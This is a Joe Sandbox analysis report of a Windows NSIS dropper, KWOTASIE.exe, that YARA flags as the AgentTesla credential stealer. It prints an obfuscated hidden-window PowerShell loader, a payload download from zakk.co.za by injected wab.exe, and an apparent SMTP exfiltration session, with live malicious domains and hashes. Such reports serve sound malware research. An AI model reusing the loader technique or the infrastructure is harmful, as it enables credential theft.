Jul 2, 2024 08:14:32.602864981 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602899075 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602952957 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602969885 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602994919 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.603018999 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.902353048 CEST	49715	80	192.168.2.5	208.95.112.1
Jul 2, 2024 08:14:32.907263994 CEST	80	49715	208.95.112.1	192.168.2.5
Jul 2, 2024 08:14:32.909786940 CEST	49715	80	192.168.2.5	208.95.112.1
Jul 2, 2024 08:14:32.909986973 CEST	49715	80	192.168.2.5	208.95.112.1
Jul 2, 2024 08:14:32.914808035 CEST	80	49715	208.95.112.1	192.168.2.5
Jul 2, 2024 08:14:33.396244049 CEST	80	49715	208.95.112.1	192.168.2.5
Jul 2, 2024 08:14:33.449534893 CEST	49715	80	192.168.2.5	208.95.112.1
Jul 2, 2024 08:14:35.010227919 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:35.015044928 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:35.015127897 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:37.937992096 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:37.938404083 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:37.943156004 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.270381927 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.270672083 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:38.275465012 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.604161978 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.615191936 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:38.620119095 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.959702015 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.959722042 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.959733963 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:38.959907055 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:38.972735882 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:38.977812052 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.305402040 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.319648981 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:39.324476004 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.651352882 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.651740074 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:39.656501055 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.984518051 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:39.984877110 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:39.989651918 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:40.344221115 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:40.344532013 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:40.349334002 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:40.676584005 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:40.676980972 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:40.681747913 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.038839102 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.039184093 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:41.044496059 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.371649027 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.372375011 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:41.372452021 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:41.372514009 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:41.372514009 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:41.377396107 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.377408028 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.377417088 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.377425909 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.943964958 CEST	587	49717	102.130.125.173	192.168.2.5
Jul 2, 2024 08:14:41.996453047 CEST	49717	587	192.168.2.5	102.130.125.173
Jul 2, 2024 08:14:42.609888077 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:42.610004902 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:15:24.356408119 CEST	49715	80	192.168.2.5	208.95.112.1
Jul 2, 2024 08:15:24.361812115 CEST	80	49715	208.95.112.1	192.168.2.5
Jul 2, 2024 08:15:24.361880064 CEST	49715	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 08:14:30.676949024 CEST	53492	53	192.168.2.5	1.1.1.1
Jul 2, 2024 08:14:30.684187889 CEST	53	53492	1.1.1.1	192.168.2.5
Jul 2, 2024 08:14:32.889214993 CEST	49875	53	192.168.2.5	1.1.1.1
Jul 2, 2024 08:14:32.898752928 CEST	53	49875	1.1.1.1	192.168.2.5
Jul 2, 2024 08:14:34.350888968 CEST	58411	53	192.168.2.5	1.1.1.1
Jul 2, 2024 08:14:35.009377003 CEST	53	58411	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 08:14:30.676949024 CEST	192.168.2.5	1.1.1.1	0x6b75	Standard query (0)	zakk.co.za	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:32.889214993 CEST	192.168.2.5	1.1.1.1	0x837f	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:34.350888968 CEST	192.168.2.5	1.1.1.1	0x6752	Standard query (0)	mail.lumies.co.za	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 08:14:30.684187889 CEST	1.1.1.1	192.168.2.5	0x6b75	No error (0)	zakk.co.za	102.218.215.35	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:32.898752928 CEST	1.1.1.1	192.168.2.5	0x837f	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:35.009377003 CEST	1.1.1.1	192.168.2.5	0x6752	No error (0)	mail.lumies.co.za	102.130.125.173	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:57.280328989 CEST	1.1.1.1	192.168.2.5	0x299d	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 2, 2024 08:14:57.280328989 CEST	1.1.1.1	192.168.2.5	0x299d	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

zakk.co.za

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	102.218.215.35	80	5032	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 08:14:30.695817947 CEST	166	OUT	GET /GHAchl0.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: zakk.co.za Cache-Control: no-cache
Jul 2, 2024 08:14:31.656052113 CEST	1236	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: application/octet-stream last-modified: Sun, 30 Jun 2024 19:05:17 GMT accept-ranges: bytes content-length: 246336 date: Tue, 02 Jul 2024 06:14:30 GMT server: LiteSpeed Data Raw: 0c 21 e1 89 6d 23 06 a5 95 57 23 90 3e 40 bd 17 27 af 8d 13 70 85 04 61 cb b4 41 0c 3d d4 46 53 da f6 7b 25 ee a8 27 02 51 81 9c fd 33 e0 63 59 94 cc 85 c4 fd f1 fe 75 92 44 6d c1 61 9d f2 c1 fd c0 51 07 67 77 fc 5d 66 18 74 d8 c6 d3 04 e3 aa ee 20 49 a6 e8 3c 6b f0 64 03 48 27 32 38 18 39 16 a3 df c4 ca 21 31 ce d4 0b 74 fd ad 95 15 fe 61 12 6c 16 50 00 38 0f c0 71 90 ce 35 54 34 96 f7 10 ff d5 0c 37 d4 11 c9 cc 87 f7 88 58 46 ad be 32 22 41 be 42 f9 5e bb 7c a0 63 1d f1 df 70 7d 06 2f 2d f6 97 b2 49 b7 7e 54 e6 11 db 1b 9d 35 b0 e7 7d 6b c4 46 fe 24 22 90 6d 8d 2a f7 2e e3 d8 30 ab 15 05 51 20 e9 3e 73 a4 c0 51 af 1d 73 b9 5f 99 bc b1 32 50 e9 46 6a 16 56 2b 4e 4c 0b c1 90 76 72 0a 1e ae c3 52 97 89 9c 9c 9c 77 ef 94 6d 3f 8d da 33 10 02 f6 e4 2d 7f 1d b4 f2 5b 2c 96 fe df b8 4f 5e b0 b6 78 40 4c 2f d6 f2 65 53 55 4f 47 77 c9 f0 3e d7 d8 fd 3c d6 ff df 79 16 e2 c8 77 61 da 98 a8 fb 16 4a b0 98 3d 83 94 60 b2 1d 3d 05 04 a7 21 30 37 00 24 18 68 31 13 ac 41 fb 6e ba 2b 76 b3 a2 3e ef aa 91 90 91 6b [TRUNCATED] Data Ascii: !m#W#>@'paA=FS{%'Q3cYuDmaQgw]ft I<kdH'289!1talP8q5T47XF2"AB^\|cp}/-I~T5}kF$"m.0Q >sQs_2PFjV+NLvrRwm?3-[,O^x@L/eSUOGw><ywaJ=`=!07$h1An+v>k'!\|-dm)(zC@<"c??=;R9g\s5O+m-iC:?>#aEdWf%Gz7AvF(L\|=(HWo}MFFkQU"% D7A('!=I%ijap./%D\|d+_Ti3XN`]{5a?K9Q_7?WU<`q\|n;^Jm,&LN83WiHQPKEA\HF6PDl02hR qjW~CvH5+q5t`6~J?^D6I%Ps(}C_FF~}u}gtJ-nk(jRdfv(trC:HKHXcU5s:3n3% a9l`?L95!v,pt/~w-*-Z\|o~]kU'w pqZwg}}7ro
Jul 2, 2024 08:14:31.656068087 CEST	224	IN	Data Raw: ba ad 1a 68 88 66 5b 24 ed ee 49 66 07 eb 88 b3 17 2a 19 9a 38 c3 46 54 96 0e 3c 32 6a 76 1c 18 d9 e7 c6 75 b5 a1 ee 5f 8b 0b 21 34 3a a4 e5 eb 7d e3 be ce 1a f7 6e 22 7f 69 fd 42 21 0c 73 ce 51 47 ba 52 1c 0d b7 67 3e d6 9a e9 e8 60 37 f0 fb 2e Data Ascii: hf[$If*8FT<2jvu_!4:}n"iB!sQGRg>`7.bS`@A2wGJI\yJ?\74?`^oo+^14odBCv^\|f-%C@O4'%lqORM0%
Jul 2, 2024 08:14:31.656081915 CEST	1236	IN	Data Raw: df 66 68 b5 82 9b 10 c2 d3 fe 56 ce e9 2d 1b f3 a7 f7 3f 86 be 55 d1 a4 26 47 89 90 cc 83 cc e2 68 5c 86 68 41 a1 95 03 58 d5 08 b7 eb 0e 3e 50 a2 78 81 86 20 6f 7b 57 a9 03 d8 33 5a 8b 1f 97 59 88 81 61 a3 c2 12 1a 23 7a 6f 38 b2 d7 a3 37 bf c8 Data Ascii: fhV-?U&Gh\hAX>Px o{W3ZYa#zo87i2.`v+G`#BSEAgxWSP{S(h`T`C\5sht~[9"5$b3a$67eaL!=q2BAg]j-rfg
Jul 2, 2024 08:14:31.656094074 CEST	1236	IN	Data Raw: dd 34 04 b6 e7 38 7c 84 6b 13 c1 37 f0 7f fb 31 e0 50 e2 e1 72 52 c5 a1 8f 90 52 f9 98 57 5d ab cf 14 91 2f 0c 9a 60 c2 a8 6f 83 f1 54 b8 de f4 ed 82 a0 84 11 d2 04 7d bb 4b da c3 f0 e7 a1 24 0b a7 9c ff 30 cc 31 02 dd 22 2a 22 bd 7c cd 80 de 1f Data Ascii: 48\|k71PrRRW]/`oT}K$01"*"\|E!/1^1(\|^t)~t/9mCDp'Qmr4/=KW}&7J\|+A/$)hIMV"eZ gyzU4@@exF;T
Jul 2, 2024 08:14:31.656105995 CEST	1236	IN	Data Raw: 90 cf 98 e5 27 4b f3 60 0b b1 64 15 91 6a b2 44 d9 63 21 1c 5c b1 0f 00 cd 52 cd 43 84 f3 da 3b a9 e8 1b 90 9a dc 04 aa 56 4e f9 bc 5a 60 27 fd 82 94 50 b1 af 28 9f 35 94 10 c1 25 dc a8 6e 53 fe a0 e0 9b 09 ef da 25 1f 08 e9 5f 9f 84 76 84 a6 09 Data Ascii: 'K`djDc!\RC;VNZ`'P(5%nS%_v0,e=cift7:g;<CRB?VxSJ1!*bE~vz#$S(~inJSUCZz`yT%nK+}hxa6]5qe"~g
Jul 2, 2024 08:14:31.656116962 CEST	1236	IN	Data Raw: 66 44 46 6b a5 50 70 c1 87 3d 34 13 b2 7e e6 72 4a 92 51 2d 1e 8d 76 1b f1 18 9d 63 8b f4 22 ac 2a 82 05 9d 8b a2 c8 80 18 d8 39 0a d6 27 21 6a df f4 37 a6 07 43 91 32 0a ef 59 fa ad 26 3c 05 b8 ed c1 ad 35 9e 18 fe 82 c3 73 68 fe a7 d3 a5 fb 23 Data Ascii: fDFkPp=4~rJQ-vc"9'!j7C2Y&<5sh#UdPtnB:sJ"KHmh3:5s?jmVa19d?hO71c!z[!RGP~H,K'k!DtrM
Jul 2, 2024 08:14:31.656126976 CEST	1236	IN	Data Raw: 31 58 8c d1 df 3f fa 44 04 48 db 07 d0 39 88 19 84 46 c0 81 7f 5a 1d 5a 6e 28 c1 e9 62 78 3c c8 76 a7 ed 9d 71 d3 f3 a5 ad ff b1 05 e3 a2 3d dc a0 f3 5f fc 7a 10 6d 97 2e 26 4c 8a dc 10 a8 ab 4e 1f 0b 96 c6 3d dd 57 db 8f 48 d3 51 50 55 9e eb c5 Data Ascii: 1X?DH9FZZn(bx<vq=_zm.&LN=WHQPUKGMw)gAPoG)g\|2Z"riNY}T1FIc*Dwq=4\|mxlS-B"r 89" Y7-2Y&s1\|J^[-{9
Jul 2, 2024 08:14:31.656137943 CEST	552	IN	Data Raw: 4b 97 ba 03 e2 c4 3a ba 36 3e c3 23 49 db 45 00 2c 7f e1 b4 66 00 0b 34 b5 8c 25 d4 97 f1 1c da 43 66 17 42 e9 49 7f 95 ab 66 75 29 c4 ec 88 7c 3d 2e 07 b7 28 ff 40 57 6f 7d bd e6 47 16 36 22 a5 60 51 75 95 d9 5f 54 60 20 57 c2 01 9f fa ef f0 0d Data Ascii: K:6>#IE,f4%CfBIfu)\|=.(@Wo}G6"`Qu_T` Wc6;$':I%ijllNky,p%dz\|^T)`ne]{G;b!3L$H z6[r(?a<lcS}n;^rH@bfNo#83}i[UP
Jul 2, 2024 08:14:31.656147957 CEST	1236	IN	Data Raw: 0b e8 b0 dc 65 4d 4f cb 9c f4 ff bf 49 88 62 5e 26 14 e4 49 6a 3a 1b cf 4e ee de 32 98 3c c7 bd 57 a8 12 3f 3e 57 86 5b e7 20 13 ef 86 93 20 58 73 0f d0 c3 e7 b9 16 03 b8 07 88 cc cd 1a f7 90 2e 7c 96 dd 46 a1 0c 73 30 d0 fe a2 ad 1c 0d 49 eb 3f Data Ascii: eMOIb^&Ij:N2<W?>W[ Xs.\|Fs0I?Vkh`7JErRuzf[Tu/\|Loi(\|7YK7b?z"ho}6/#;v\?%i(HG8]vY~\-`A@$'!}7)E/]/hKB
Jul 2, 2024 08:14:31.656160116 CEST	1236	IN	Data Raw: 2d 8f 65 5b 39 8d b4 13 3e ba 83 c4 9f f7 ec 5d 11 51 4d ee a0 b0 00 99 eb f8 e3 90 f2 a0 b6 9b 19 ac f9 7e eb 9d 63 82 3a 73 48 2b e8 c9 07 b8 4b fa 70 5d 63 6c 01 a3 ad c5 ca 8c 33 44 33 6d 9d 4c 87 1b 81 f4 25 dc 20 47 fe 13 e4 cd 9e bf b9 4d Data Ascii: -e[9>]QM~c:sH+Kp]cl3D3mL% GM=1<5c%jTG:uZvui(^k^DutrMrkhk+NM=86GMVMIUx'3/*fGm+vNn&B$L:IT@
Jul 2, 2024 08:14:31.661001921 CEST	1236	IN	Data Raw: c5 c6 36 84 ae 4b b9 b2 e1 69 92 2e ec d8 82 66 bf 57 13 80 9b 10 b6 3c c9 6b 47 88 b4 95 82 ff 26 d0 e4 29 4d e5 dd a3 fd 4b 63 22 95 db b8 6b 41 4f 97 dc 76 9b 40 f4 61 75 74 54 8b f7 78 b0 02 cf 47 8e a3 b4 b0 eb 9f 11 23 ee 29 09 46 6b af 50 Data Ascii: 6Ki.fW<kG&)MKc"kAOv@autTxG#)FkPm\|@S5y.cx\9&<+&`7C4"4Hs)\|HYU9sa]?ZtE^>pEhHKTol!;5}(nMy GG+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	208.95.112.1	80	5032	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 08:14:32.909986973 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 2, 2024 08:14:33.396244049 CEST	175	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 06:14:33 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 2, 2024 08:14:37.937992096 CEST	587	49717	102.130.125.173	192.168.2.5	220-vps5.ncwsa.co.za ESMTP Exim 4.96.2 #2 Tue, 02 Jul 2024 08:14:37 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 2, 2024 08:14:37.938404083 CEST	49717	587	192.168.2.5	102.130.125.173	EHLO 887849
Jul 2, 2024 08:14:38.270381927 CEST	587	49717	102.130.125.173	192.168.2.5	250-vps5.ncwsa.co.za Hello 887849 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 2, 2024 08:14:38.270672083 CEST	49717	587	192.168.2.5	102.130.125.173	STARTTLS
Jul 2, 2024 08:14:38.604161978 CEST	587	49717	102.130.125.173	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	02:13:35
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\KWOTASIE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KWOTASIE.exe"
Imagebase:	0x400000
File size:	982'616 bytes
MD5 hash:	ECBEC21DCFA39A1131D2A79ACDF73F88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:13:36
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
Imagebase:	0x300000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:13:36
Start date:	02/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:14:21
Start date:	02/07/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0xcc0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.8%
Total number of Nodes:	1348
Total number of Limit Nodes:	36

Executed Functions

Function 0040333D Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403360
GetVersion.KERNEL32 ref: 00403366
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
OleInitialize.OLE32(00000000), ref: 004033DD
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\KWOTASIE.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
CharNextW.USER32(00000000,"C:\Users\user\Desktop\KWOTASIE.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448

Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036AE
OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
ExitProcess.KERNEL32 ref: 004036D4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KWOTASIE.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
CopyFileW.KERNEL32(C:\Users\user\Desktop\KWOTASIE.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
AdjustTokenPrivileges.ADVAPI32 ref: 00403832
ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
ExitProcess.KERNEL32 ref: 0040387A

Strings

~nsu, xrefs: 004036DF
,nsorrowful Niela Riefs C.lli"s,mbolpBin.esoSlo chw.timlee .ilhurXe.oposSen.omhPrer.fe Un,aml .ilkelSk,bsb.Norm.leAtomi xDi.ette , xrefs: 00403766, 004037CE
UXTHEME, xrefs: 0040338D, 00403392, 00403398
C:\Users\user\Desktop, xrefs: 00403706, 0040370B, 00403738
Error launching installer, xrefs: 0040366A
SeShutdownPrivilege, xrefs: 00403809
C:\Users\user\Desktop\KWOTASIE.exe, xrefs: 00403792
.tmp, xrefs: 004036FB
TMP, xrefs: 004035CF
1033, xrefs: 004035E3
C:\Users\user\AppData\Local\Innoxious, xrefs: 00403565, 00403685, 0040372F, 00403739
TEMP, xrefs: 004035C7
C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 00403690
NSIS Error, xrefs: 004033FF
Low, xrefs: 004035B5
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 00403414, 0040341A, 00403610
C:\Users\user\AppData\Local\Temp\, xrefs: 00403577, 0040357C, 00403592, 0040359E, 004035AD, 004035BA, 004035C6, 004035CE, 004036E4, 004036F5, 00403700, 0040370C, 00403719, 00403728, 004037D9
\Temp, xrefs: 00403599

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$,nsorrowful Niela Riefs C.lli"s,mbolpBin.esoSlo chw.timlee .ilhurXe.oposSen.omhPrer.fe Un,aml .ilkelSk,bsb.Norm.leAtomi xDi.ette $.tmp$1033$C:\Users\user\AppData\Local\Innoxious$C:\Users\user\AppData\Local\Innoxious\olivilin$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KWOTASIE.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
